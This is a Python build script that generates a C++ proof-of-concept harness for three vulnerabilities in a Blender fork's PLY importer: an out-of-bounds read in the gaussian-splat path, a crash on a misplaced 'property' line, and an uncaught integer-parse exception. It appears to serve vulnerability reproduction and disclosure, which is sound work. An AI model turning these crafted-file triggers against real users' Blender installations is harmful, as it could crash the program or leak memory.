#!/usr/bin/env python3
"""Builds a standalone PoC harness for three vulnerabilities in Blender's PLY
importer, compiling the actual fork code:

  - source/blender/io/ply/importer/ply_import_buffer.cc   (compiled unmodified)
  - source/blender/io/ply/importer/ply_import_data.cc     (compiled unmodified)
  - read_header() and its helpers, extracted VERBATIM from ply_import.cc
  - find_custom_attribute() and the gsplat consumer reads, extracted VERBATIM
    from ply_import_gsplat.cc

Only BKE/point-cloud plumbing (which receives the already-read values) is
replaced; the parsing and the out-of-bounds reads themselves are the fork's
code, unmodified.

Usage: build_harness.py <path-to-fork-checkout> <output-dir>
"""
import os
import re
import sys

REPO = sys.argv[1]
OUT = sys.argv[2]

PLY_IMPORT_CC = os.path.join(REPO, "source/blender/io/ply/importer/ply_import.cc")
PLY_GSPLAT_CC = os.path.join(REPO, "source/blender/io/ply/importer/ply_import_gsplat.cc")


def find_line(text, anchor):
    idx = text.index(anchor)
    return text.rfind("\n", 0, idx) + 1


def extract_func(text, anchor):
    """Extract a whole function (through its outer closing brace) that
    contains `anchor`, starting at the beginning of its signature line."""
    start = find_line(text, anchor)
    i = text.index("{", start)
    depth = 0
    j = i
    while True:
        c = text[j]
        if c == "{":
            depth += 1
        elif c == "}":
            depth -= 1
            if depth == 0:
                break
        j += 1
    return text[start:j + 1], text[:start].count("\n") + 1


def main():
    ply_import = open(PLY_IMPORT_CC).read()
    gsplat = open(PLY_GSPLAT_CC).read()

    pieces = []  # (description, code)

    for anchor, desc in [
        ("static bool parse_keyword(Span<char> &str", "parse_keyword"),
        ("static Span<char> parse_word(Span<char> &str)", "parse_word"),
        ("static void skip_space(Span<char> &str)", "skip_space"),
        ("static PlyDataTypes type_from_string(Span<char> word)", "type_from_string"),
        ("const char *read_header(PlyReadBuffer &file", "read_header"),
    ]:
        code, line = extract_func(ply_import, anchor)
        pieces.append((f"ply_import.cc:{line} ({desc})", code))

    code, line = extract_func(gsplat, "static std::optional<Span<float>> find_custom_attribute")
    pieces.append((f"ply_import_gsplat.cc:{line} (find_custom_attribute)", code))

    # The consumer read lines from convert_gsplat_ply_to_point_cloud's main loop
    # (the sink of Finding 1). We keep the read expressions verbatim and only
    # replace the PointCloud accessor writes with a volatile sink, since the
    # BKE point-cloud API is not linked into this harness. The reads -
    # including their out-of-bounds indices - are unchanged.
    m = re.search(
        r"radiance_base\[i\] = float4\(ply_f_dc\[0\]\[i\], ply_f_dc\[1\]\[i\],"
        r" ply_f_dc\[2\]\[i\], ply_opacity\[i\]\);",
        gsplat,
    )
    assert m, "gsplat consumer loop not found"
    radiance_line = m.group(0)
    m = re.search(
        r"scale\[i\] = float3\(ply_scale\[0\]\[i\], ply_scale\[1\]\[i\], ply_scale\[2\]\[i\]\);",
        gsplat,
    )
    assert m, "gsplat scale line not found"
    scale_line = m.group(0)
    gsplat_line_no = gsplat[:m.start()].count("\n") + 1

    banner = "\n".join(
        f"/* ==== VERBATIM from {desc} ==== */\n{code}" for desc, code in pieces
    )

    harness = r"""/* AUTO-GENERATED by build_harness.py -- do not edit.
 *
 * Standalone PoC harness for three Blender PLY-importer vulnerabilities.
 * Compiles against the fork's own code:
 *   - ply_import_buffer.cc and ply_import_data.cc are compiled unmodified,
 *   - the functions below are extracted VERBATIM from the fork's sources
 *     (see the ==== VERBATIM ==== banners),
 *   - the gsplat consumer loop at the bottom reproduces the read expressions
 *     of convert_gsplat_ply_to_point_cloud() verbatim, replacing only the
 *     PointCloud accessor writes (BKE not linked) with a volatile sink.
 */
#include <charconv>
#include <cstdio>
#include <cstring>
#include <memory>
#include <optional>
#include <string>
#include <string_view>

#include "BLI_span.hh"
#include "BLI_string_ref.hh"
#include "BLI_vector.hh"

#include "ply_data.hh"
#include "ply_import_buffer.hh"
#include "ply_import_data.hh"

namespace blender {

namespace io::ply {

""" + banner + r"""

}  // namespace io::ply

}  // namespace blender

using namespace blender;
using namespace blender::io::ply;

/* ------------------------------------------------------------------ */
/* Case 1: gsplat OOB read via duplicate `element vertex` sections.    */

static void report_ply_data(const PlyData &data)
{
  printf("  parsed OK: vertices=%lld\n", (long long)data.vertices.size());
  for (const PlyCustomAttribute &attr : data.vertex_custom_attr) {
    printf("  custom attr %-10s size=%lld\n", attr.name.c_str(), (long long)attr.data.size());
  }
}

/* The attribute-presence conditions checked by is_data_gaussian_splat()
 * (ply_import.cc) -- all of them hold for the PoC input, so in Blender the
 * file is routed to convert_gsplat_ply_to_point_cloud(). */
static bool gsplat_conditions_hold(const PlyData &data)
{
  const bool no_faces_edges_uvs = data.edges.is_empty() && data.face_vertices.is_empty() &&
                                  data.face_sizes.is_empty() && data.uv_coordinates.is_empty();
  if (!no_faces_edges_uvs) {
    return false;
  }
  for (const char *name : {"f_dc_0", "f_dc_1", "f_dc_2", "opacity", "scale_0", "scale_1",
                           "scale_2", "rot_0", "rot_1", "rot_2", "rot_3"}) {
    if (!find_custom_attribute(data, name).has_value()) {
      return false;
    }
  }
  return true;
}

static int run_case1(const char *path, bool print_values)
{
  printf("[case1] file: %s\n", path);
  PlyReadBuffer file(path, 64 * 1024);
  PlyHeader header;
  const char *err = read_header(file, header);
  if (err != nullptr) {
    printf("  header error: %s\n", err);
    return 1;
  }
  std::unique_ptr<PlyData> data = import_ply_data(file, header);
  if (data == nullptr || !data->error.empty()) {
    printf("  import error: %s\n", data ? data->error.c_str() : "null");
    return 1;
  }
  report_ply_data(*data);
  printf("  is_data_gaussian_splat conditions hold: %s\n",
         gsplat_conditions_hold(*data) ? "YES -> convert_gsplat_ply_to_point_cloud() is called"
                                       : "no");

  /* Required gsplat attributes, obtained exactly as
   * convert_gsplat_ply_to_point_cloud() does. */
  const std::optional<Span<float>> ply_f_dc_0 = find_custom_attribute(*data, "f_dc_0");
  const std::optional<Span<float>> ply_f_dc_1 = find_custom_attribute(*data, "f_dc_1");
  const std::optional<Span<float>> ply_f_dc_2 = find_custom_attribute(*data, "f_dc_2");
  const std::optional<Span<float>> ply_opacity_attr = find_custom_attribute(*data, "opacity");
  const std::optional<Span<float>> ply_scale_0 = find_custom_attribute(*data, "scale_0");
  const std::optional<Span<float>> ply_scale_1 = find_custom_attribute(*data, "scale_1");
  const std::optional<Span<float>> ply_scale_2 = find_custom_attribute(*data, "scale_2");
  const std::optional<Span<float>> ply_rot_0 = find_custom_attribute(*data, "rot_0");
  const std::optional<Span<float>> ply_rot_1 = find_custom_attribute(*data, "rot_1");
  const std::optional<Span<float>> ply_rot_2 = find_custom_attribute(*data, "rot_2");
  const std::optional<Span<float>> ply_rot_3 = find_custom_attribute(*data, "rot_3");
  Span<float> ply_f_dc[3] = {*ply_f_dc_0, *ply_f_dc_1, *ply_f_dc_2};
  Span<float> ply_opacity = *ply_opacity_attr;
  const Span<float> ply_scale[3] = {*ply_scale_0, *ply_scale_1, *ply_scale_2};
  const Span<float> ply_rot[4] = {*ply_rot_0, *ply_rot_1, *ply_rot_2, *ply_rot_3};

  /* NOTE: the vertex count for the copy loop below is data.vertices.size()
   * (combined over BOTH `element vertex` sections), while each attribute span
   * above was sized to its own element's count -- this is the bug. */

  if (print_values) {
    printf("  values read by the consumer loop (first indices; anything at/after\n"
           "  index >= attribute size is read OUT OF BOUNDS):\n");
    const int64_t limit = data->vertices.size() < 16 ? data->vertices.size() : 16;
    for (int i = 0; i < limit; i++) {
      const char *flag = i < ply_f_dc[0].size() ? "" : "   <-- OUT OF BOUNDS";
      printf("    i=%-3lld f_dc_0=%.4f opacity=%.4f scale_0=%.4f rot_0=%.4f%s\n",
             (long long)i,
             ply_f_dc[0][i],
             ply_opacity[i],
             ply_scale[0][i],
             ply_rot[0][i],
             flag);
    }
  }

  /* The consumer loop of convert_gsplat_ply_to_point_cloud()
   * (ply_import_gsplat.cc, around line """ + str(gsplat_line_no) + r"""):
   *   for (int i = 0; i < data.vertices.size(); i++) {
   *     radiance_base[i] = float4(ply_f_dc[0][i], ...);   <- VERBATIM below
   *     scale[i] = float3(ply_scale[0][i], ...);          <- VERBATIM below
   *     ...
   *   }
   * radiance_base/scale are PointCloud accessor spans (not linked here), so
   * the read results go to a volatile sink instead. The reads themselves,
   * with their out-of-bounds indices, are unchanged. */
  volatile float sink = 0.0f;
  long long oob_reads = 0;
  const long long attr_size = ply_f_dc[0].size();
  for (int i = 0; i < data->vertices.size(); i++) {
    if (i >= attr_size) {
      oob_reads++;
    }
    /* radiance_base[i] = */ sink +=
        float4(ply_f_dc[0][i], ply_f_dc[1][i], ply_f_dc[2][i], ply_opacity[i]).x;
    /* scale[i] = */ sink += float3(ply_scale[0][i], ply_scale[1][i], ply_scale[2][i]).x;
    sink += ply_rot[0][i] + ply_rot[1][i] + ply_rot[2][i] + ply_rot[3][i];
  }
  printf("  consumer loop finished: %lld out-of-bounds reads performed (sink=%f)\n",
         oob_reads,
         (double)sink);
  printf("[case1] RESULT: no out-of-bounds access detected (control file?)\n");
  return 0;
}

/* ------------------------------------------------------------------ */
/* Case 2: `property` before any `element` -> elements.last() on empty. */

static int run_case2(const char *path)
{
  printf("[case2] file: %s\n", path);
  PlyReadBuffer file(path, 64 * 1024);
  PlyHeader header;
  printf("  calling read_header() on header with `property` line...\n");
  fflush(stdout);
  const char *err = read_header(file, header);
  /* If we get here, no crash happened. */
  printf("  read_header returned: %s, elements=%lld\n",
         err ? err : "nullptr (OK)",
         (long long)header.elements.size());
  printf("[case2] RESULT: no crash (control file?)\n");
  return 0;
}

/* ------------------------------------------------------------------ */
/* Case 3: non-numeric element count -> uncaught std::stoi exception.   */

static int run_case3(const char *path)
{
  printf("[case3] file: %s\n", path);
  PlyReadBuffer file(path, 64 * 1024);
  PlyHeader header;
  printf("  calling read_header() on header with `element vertex x`...\n");
  fflush(stdout);
  const char *err = read_header(file, header);
  printf("  read_header returned: %s\n", err ? err : "nullptr (OK)");
  printf("[case3] RESULT: no exception (control file?)\n");
  return 0;
}

int main(int argc, char **argv)
{
  setvbuf(stdout, nullptr, _IONBF, 0);
  if (argc < 3) {
    fprintf(stderr, "usage: %s <case1|case1-values|case2|case3> <ply-file>\n", argv[0]);
    return 2;
  }
  std::string mode = argv[1];
  const char *path = argv[2];
  if (mode == "case1") {
    return run_case1(path, false);
  }
  if (mode == "case1-values") {
    return run_case1(path, true);
  }
  if (mode == "case2") {
    return run_case2(path);
  }
  if (mode == "case3") {
    return run_case3(path);
  }
  fprintf(stderr, "unknown mode %s\n", mode.c_str());
  return 2;
}
"""

    out_cc = os.path.join(OUT, "poc_harness_generated.cc")
    with open(out_cc, "w") as f:
        f.write(harness)
    print(f"wrote {out_cc}")


if __name__ == "__main__":
    main()
